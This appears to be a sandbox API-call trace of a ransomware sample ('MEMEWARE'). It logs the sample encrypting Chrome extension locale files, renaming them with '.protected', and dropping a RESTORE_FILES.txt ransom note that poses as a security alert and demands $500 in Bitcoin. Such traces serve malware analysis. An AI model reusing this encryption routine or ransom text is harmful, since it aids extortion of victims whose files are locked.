[0080.346] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.347] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.347] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.347] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.348] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xa7, lpOverlapped=0x0) returned 1 [0080.349] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.349] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xa7, lpOverlapped=0x0) returned 1 [0080.349] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.349] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.349] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.349] CloseHandle (hObject=0x168) returned 1 [0080.349] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.protected") returned 165 [0080.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.protected")) returned 1 [0080.350] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.350] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.350] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\RESTORE_FILES.txt") returned 159 [0080.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.351] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.351] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.352] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.352] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.352] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.352] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.352] CloseHandle (hObject=0x164) returned 1 [0080.352] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0080.352] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0080.352] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg") returned 141 [0080.352] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0080.352] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0080.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*") returned 143 [0080.353] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.354] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.354] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.354] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.354] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.354] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\.") returned 143 [0080.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.354] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.354] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.354] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.354] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.354] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\..") returned 144 [0080.354] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.354] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.354] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.354] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.354] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.354] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.355] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.355] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0080.355] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.355] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x114, lpOverlapped=0x0) returned 1 [0080.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.356] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x114, lpOverlapped=0x0) returned 1 [0080.357] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.357] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.357] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.357] CloseHandle (hObject=0x168) returned 1 [0080.357] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.protected") returned 165 [0080.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.protected")) returned 1 [0080.358] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.358] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.358] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0080.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.359] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.359] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.360] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.360] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.360] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.360] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.360] CloseHandle (hObject=0x164) returned 1 [0080.360] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="Windows") returned -1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="Program Files") returned -1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="Program Files (x86)") returned -1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="$Recycle.bin") returned 1 [0080.360] lstrcmpiW (lpString1="bn", lpString2="System Volume Information") returned -1 [0080.360] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn") returned 141 [0080.360] lstrcmpW (lpString1="bn", lpString2=".") returned 1 [0080.360] lstrcmpW (lpString1="bn", lpString2="..") returned 1 [0080.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*") returned 143 [0080.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.361] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.361] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.361] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.361] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.361] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\.") returned 143 [0080.361] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.361] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.361] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.361] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.361] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.361] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.361] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\..") returned 144 [0080.361] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.361] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.361] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.361] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0080.361] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.362] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.362] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.362] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) 